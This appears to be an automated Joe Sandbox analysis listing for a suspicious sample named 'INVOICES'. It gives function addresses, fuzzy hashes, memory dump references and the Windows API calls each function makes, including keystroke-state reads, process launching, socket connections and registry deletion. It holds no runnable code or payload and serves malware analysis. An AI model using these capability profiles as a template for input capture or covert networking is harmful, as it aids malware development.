                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 456cdd9f9c35fccee61c7c0c26d5113ac153f29af98fc7e155a7567c1f4abec3
                                                                                                                                  • Instruction ID: 342ee31cda4e25724779ebd97bc8a8e6b175e723d82899627e6ec65a41b7dc50
                                                                                                                                  • Opcode Fuzzy Hash: 456cdd9f9c35fccee61c7c0c26d5113ac153f29af98fc7e155a7567c1f4abec3
                                                                                                                                  • Instruction Fuzzy Hash: D6714931900149EFDB04DF98CC89EAEBB79FF85310F54C159F915AB252C738AA51CBA4
                                                                                                                                  Function 007BB385 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsWindow.USER32(010C49E0), ref: 007BB41F
                                                                                                                                  • IsWindowEnabled.USER32(010C49E0), ref: 007BB42B
                                                                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007BB50F
                                                                                                                                  • SendMessageW.USER32(010C49E0,000000B0,?,?), ref: 007BB546
                                                                                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 007BB583
                                                                                                                                  • GetWindowLongW.USER32(010C49E0,000000EC), ref: 007BB5A5
                                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007BB5BD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4072528602-0
                                                                                                                                  • Opcode ID: 00ad6f1904da6af758d391032f7f556f54c616fc54a3c627a00a9057681d69df
                                                                                                                                  • Instruction ID: d8e468b29ffb75020984308ad4a1faab4e2fccb97900942a483fffc0fde0d251
                                                                                                                                  • Opcode Fuzzy Hash: 00ad6f1904da6af758d391032f7f556f54c616fc54a3c627a00a9057681d69df
                                                                                                                                  • Instruction Fuzzy Hash: 0B718D34601644EFDB249F64C894FFABBB9FF09300F548069EE55972A2C7B9AD51CB20
                                                                                                                                  Function 007AF532 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007AF55C
                                                                                                                                  • _memset.LIBCMT ref: 007AF625
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 007AF66A
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                    • Part of subcall function 0074FE06: _wcscpy.LIBCMT ref: 0074FE29
                                                                                                                                  • GetProcessId.KERNEL32(00000000), ref: 007AF6E1
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 007AF710
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 3522835683-2766056989
                                                                                                                                  • Opcode ID: 34b8307cab5be5fb542e544bf916de005dbe739a778b8e8817494afad6a78085
                                                                                                                                  • Instruction ID: a899ff91e11e1189b21940f4d7a086d690ff2a38e9863a122f092c53ae0ee771
                                                                                                                                  • Opcode Fuzzy Hash: 34b8307cab5be5fb542e544bf916de005dbe739a778b8e8817494afad6a78085
                                                                                                                                  • Instruction Fuzzy Hash: D961C275A00619DFCF14EF94C8859ADBBF4FF89310F148169E845AB362CB38AD41CB94
                                                                                                                                  Function 0079127E Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32(?), ref: 007912BD
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 007912D2
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00791333
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00791361
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00791380
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 007913C6
                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007913E9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                  • Opcode ID: ec4a5abc017da0447160f050412ffc42e2bb4257bbda507e355415cbda183960
                                                                                                                                  • Instruction ID: 1225c0d74d8484777f209da851f78cb442afec6c0902104f9d40f215b600e54d
                                                                                                                                  • Opcode Fuzzy Hash: ec4a5abc017da0447160f050412ffc42e2bb4257bbda507e355415cbda183960
                                                                                                                                  • Instruction Fuzzy Hash: 8151D3A0A047D77EFF3647349C4ABBA7EA96F06704F888589E0D5468D2C2DCACA4D750
                                                                                                                                  Function 00791097 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32(00000000), ref: 007910D6
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 007910EB
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 0079114C
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00791178
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00791195
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007911D9
                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007911FA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                  • Opcode ID: 2ac316fb2de085d29b4d4f33f8a58e56f232ce7f2de06254f75a91f6d2a48a8a
                                                                                                                                  • Instruction ID: e7ec9e4e1a13a850fe725b8ae0e16165d6210b4d9844c78eb6de897386b66461
                                                                                                                                  • Opcode Fuzzy Hash: 2ac316fb2de085d29b4d4f33f8a58e56f232ce7f2de06254f75a91f6d2a48a8a
                                                                                                                                  • Instruction Fuzzy Hash: 7F5109A06447DB3DFF3687349C45BBA7FA96F06300F488589E1D54A8C2D29DECA8D750
                                                                                                                                  Function 007956A4 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2945705084-0
                                                                                                                                  • Opcode ID: b0fa3f0cdccce35807e0ab4ceac9d5c12d58360f0dc79f6cabb010aafe2230d3
                                                                                                                                  • Instruction ID: 841d4a0a397fd8b78487cdb3d3fb0b224700e65c928fdb5c2fd2fce68fd2b29f
                                                                                                                                  • Opcode Fuzzy Hash: b0fa3f0cdccce35807e0ab4ceac9d5c12d58360f0dc79f6cabb010aafe2230d3
                                                                                                                                  • Instruction Fuzzy Hash: 8C41A666C20A28B5CB11EBB49C8AADF7778AF05311F108866F914E3122F67C9749C7A5
                                                                                                                                  Function 00732344 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00732357
                                                                                                                                  • ScreenToClient.USER32(007F57B0,?), ref: 00732374
                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00732399
                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 007323A7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                  • String ID: MZER
                                                                                                                                  • API String ID: 4210589936-2424380061
                                                                                                                                  • Opcode ID: 40fcd6716aa61db71de960f3bb3020ee7b44b8b75650f121e1124a1477808e06
                                                                                                                                  • Instruction ID: a713c2c6a0f7ad2ddcc241d1b37c9f7bc4ba3ccba582faffbe204b89bfaa3948
                                                                                                                                  • Opcode Fuzzy Hash: 40fcd6716aa61db71de960f3bb3020ee7b44b8b75650f121e1124a1477808e06
                                                                                                                                  • Instruction Fuzzy Hash: 80418175904119FBDF1A9F68CC48BE9BB75FB05320F20432AF86592292C7386951DB91
                                                                                                                                  Function 007936B5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007946AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007936DB,?), ref: 007946CC
                                                                                                                                    • Part of subcall function 007946AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007936DB,?), ref: 007946E5
                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 007936FB
                                                                                                                                  • _wcscmp.LIBCMT ref: 00793717
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0079372F
                                                                                                                                  • _wcscat.LIBCMT ref: 00793777
                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 007937E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 1377345388-1173974218
                                                                                                                                  • Opcode ID: 335b9893f9cb24aa04bed9b59d1b52708d98dc1324e4850989b4b18cee65d4d4
                                                                                                                                  • Instruction ID: b17891255f16feda8567a5c2e9a619ec1b0782fbcb369e3a7126b0819e7d829c
                                                                                                                                  • Opcode Fuzzy Hash: 335b9893f9cb24aa04bed9b59d1b52708d98dc1324e4850989b4b18cee65d4d4
                                                                                                                                  • Instruction Fuzzy Hash: 644181B25083459ACB51EF64E485ADBB7E8EF89340F00492EB48AC3151EA3CD749C756
                                                                                                                                  Function 007B72C3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007B72DC
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B7383
                                                                                                                                  • IsMenu.USER32(?), ref: 007B739B
                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007B73E3
                                                                                                                                  • DrawMenuBar.USER32 ref: 007B73F6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 3866635326-4108050209
                                                                                                                                  • Opcode ID: 405c4c7416de536656819044d506387172c8e2594230e24e3a967bd34f98349b
                                                                                                                                  • Instruction ID: ed4829a318de3a76cf58fa8878bdbc0789776ef44b1993665409c359c8488aca
                                                                                                                                  • Opcode Fuzzy Hash: 405c4c7416de536656819044d506387172c8e2594230e24e3a967bd34f98349b
                                                                                                                                  • Instruction Fuzzy Hash: 08412575A04248EFDB24DF60D884EEABBF8FF48355F048129ED1597260D738AD51DBA0
                                                                                                                                  Function 007B102D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007B105C
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007B1086
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 007B113D
                                                                                                                                    • Part of subcall function 007B102D: RegCloseKey.ADVAPI32(?), ref: 007B10A3
                                                                                                                                    • Part of subcall function 007B102D: FreeLibrary.KERNEL32(?), ref: 007B10F5
                                                                                                                                    • Part of subcall function 007B102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007B1118
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 007B10E0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 395352322-0
                                                                                                                                  • Opcode ID: b30e30e22f1f65b89f7791270a2172a727f1c37c603d66f8cdaa0c6f0290a8df
                                                                                                                                  • Instruction ID: 2d5b0994cba1ed26b8f40f4f60a57a4dc0e4d34a49d27a2119d79cf85aa736b2
                                                                                                                                  • Opcode Fuzzy Hash: b30e30e22f1f65b89f7791270a2172a727f1c37c603d66f8cdaa0c6f0290a8df
                                                                                                                                  • Instruction Fuzzy Hash: 43311AB190110DBFDB159BA4DC99FFEB7BCEB08340F804169E501A2151EA789F859AA4
                                                                                                                                  Function 007B62FF Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007B631E
                                                                                                                                  • GetWindowLongW.USER32(010C49E0,000000F0), ref: 007B6351
                                                                                                                                  • GetWindowLongW.USER32(010C49E0,000000F0), ref: 007B6386
                                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007B63B8
                                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007B63E2
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 007B63F3
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007B640D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                  • Opcode ID: d72f9da3898e0815c2c30e7e74d3171f9fc67815a905f3a47263214ded91d5a4
                                                                                                                                  • Instruction ID: d15c578c753a23c39d37928b867f3dddc8c802280562789fbe3ae46b81e40d5c
                                                                                                                                  • Opcode Fuzzy Hash: d72f9da3898e0815c2c30e7e74d3171f9fc67815a905f3a47263214ded91d5a4
                                                                                                                                  • Instruction Fuzzy Hash: 6631E2316046509FDB21CF18DC88FA53BE1FB4A754F1981A4FA11CF2B2CB6AA840DB55
                                                                                                                                  Function 007A6289 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007A7EA0: inet_addr.WS2_32(00000000), ref: 007A7ECB
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 007A62DC
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 007A62EB
                                                                                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 007A6324
                                                                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 007A632D
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 007A6337
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 007A6360
                                                                                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 007A6379
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 910771015-0
                                                                                                                                  • Opcode ID: 6ef38495b7ba672074600d8ad973b6d6940474c9afc6ab9a578aca6090852c7c
                                                                                                                                  • Instruction ID: b5cafbab56135c04ec310175c9c7cce4f428bd7b38b53e4b7e98829e40f59830
                                                                                                                                  • Opcode Fuzzy Hash: 6ef38495b7ba672074600d8ad973b6d6940474c9afc6ab9a578aca6090852c7c
                                                                                                                                  • Instruction Fuzzy Hash: 5A31A771600118AFDF109F64CC89FBE77A9EB85720F048269F945972D1DB78AD05CB61
                                                                                                                                  Function 0078F98F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
